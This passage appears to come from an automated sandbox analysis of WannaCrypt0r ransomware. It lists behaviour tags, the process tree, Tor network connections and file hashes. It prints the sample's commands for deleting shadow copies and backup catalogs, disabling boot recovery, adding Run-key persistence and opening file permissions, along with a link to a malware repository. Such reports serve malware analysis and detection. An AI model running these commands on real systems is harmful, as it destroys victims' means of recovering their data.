PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1268 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1268 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1268 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 1028 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/WannaCrypt0r.zip

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1544 CREDAT:275457 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7fc9758,0x7fef7fc9768,0x7fef7fc9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1628 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2284 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2292 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1316 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3344 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3564 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x140177688,0x140177698,0x1401776a8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3788 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2520 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2452 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3880 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3948 --field-trial-handle=1228,i,14647329466196704627,10933583508017716009,131072 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\WannaCrypt0r\" -spe -an -ai#7zMap11932:86:7zEvent27053

C:\Users\Admin\Desktop\WannaCrypt0r\[email protected]

"C:\Users\Admin\Desktop\WannaCrypt0r\[email protected]"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c 146601726389075.bat

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]

@[email protected] vs

C:\Users\Admin\Desktop\WannaCrypt0r\TaskData\Tor\taskhsvc.exe

TaskData\Tor\taskhsvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x7c

C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe

taskdl.exe

C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe

taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]

C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]

@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lmlkrbkipiq805" /t REG_SZ /d "\"C:\Users\Admin\Desktop\WannaCrypt0r\tasksche.exe\"" /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lmlkrbkipiq805" /t REG_SZ /d "\"C:\Users\Admin\Desktop\WannaCrypt0r\tasksche.exe\"" /f

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]

C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe

taskdl.exe

C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe

taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]

C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]

@[email protected]

C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe

taskdl.exe

C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe

taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]

C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]

@[email protected]

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.bing.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.178.4:443 www.google.com udp
GB 142.250.178.4:443 www.google.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.111.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 185.199.109.154:443 github.githubassets.com tcp
GB 216.58.204.74:443 content-autofill.googleapis.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
GB 142.250.179.227:80 www.gstatic.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
DE 78.47.18.110:80 tcp
US 128.31.0.39:9101 tcp
DE 136.243.214.137:443 tcp
CA 167.114.35.28:9001 tcp
US 154.35.175.225:443 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:60371 tcp
NL 146.185.177.103:9030 tcp
DE 193.23.244.244:443 tcp
DE 138.201.196.252:9993 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabF6DF.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarF75F.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a862ea9f422f70c28b2076fc3bbcb856
SHA1 4a2d2833cbf66842f3229d1c2c29fa9800e4f08c
SHA256 b5aae656b9f0b6339a105c70ef982f8f135f9371e0d1a081c300586d0c5bcca2
SHA512 f90a23159ce628f3bad9ff2dd64e021664dcf3b7227b772005308d6e86058a50db1ac8d053c56e4b05d013a8df438d9eb5e32537e7f73332347472926e63e4ad

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 55467b03f3c6a5ccd3c1144ba31d86f9
SHA1 2a1021b7465eff357e0006becbfe982f1bb5dd12
SHA256 79ab66d4eb54593283987688a67c767befb4c90f75d4b3156b2b1aeb03a3f787
SHA512 dd26c748f75b140a11c0df8168f7ebd02a20fc4dbe9af86fb5f1f211c378d4f2106158f7f438a6a46808153b7e9a606e1a7d44bea2ed3859ee1d6dd5cf8a7b9d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b2f5c46120976d2a83c706de68fea55c
SHA1 62a9bd844b88a7d3e901de49911d9406b1ce945f
SHA256 7db2e2ca6cabe737bed456933608ebc120087cbda17e2f95349940336ccec850
SHA512 68151e8bb2f30e6215340f2ee014f10f7c0c498d04ffaba043a12f1a7c2e6202f7139bd5c3c18733b52449a40f1e966a977099e3eed87bbc4fb3e73d11d8d123

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 208ad512be9c6cfabe14693c4eba1c1f
SHA1 66fffca9b5ace1c90593b65a20c048de7db053ef
SHA256 95db9d58d4c9783c70531531551b60cee5e85ed61b797749f96fd8ee2fa1bea5
SHA512 400f29a55ae0bb21b5002445c4874eda310a9ad57970fe7d876b675a061dc11ede71b863df8a6f9c27e8a0fcd016553de58da30fb0abd530bc28ba1133d97e0d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8a72b5a98c0bfccbba3a375f2473e05f
SHA1 902a3d0cb5c1096205177e08b698523cd79456df
SHA256 d49ceddfa65b0a84e2fc6e9a88bdb7f2c7dd78852ba8d755ca850cfac33ea0a5
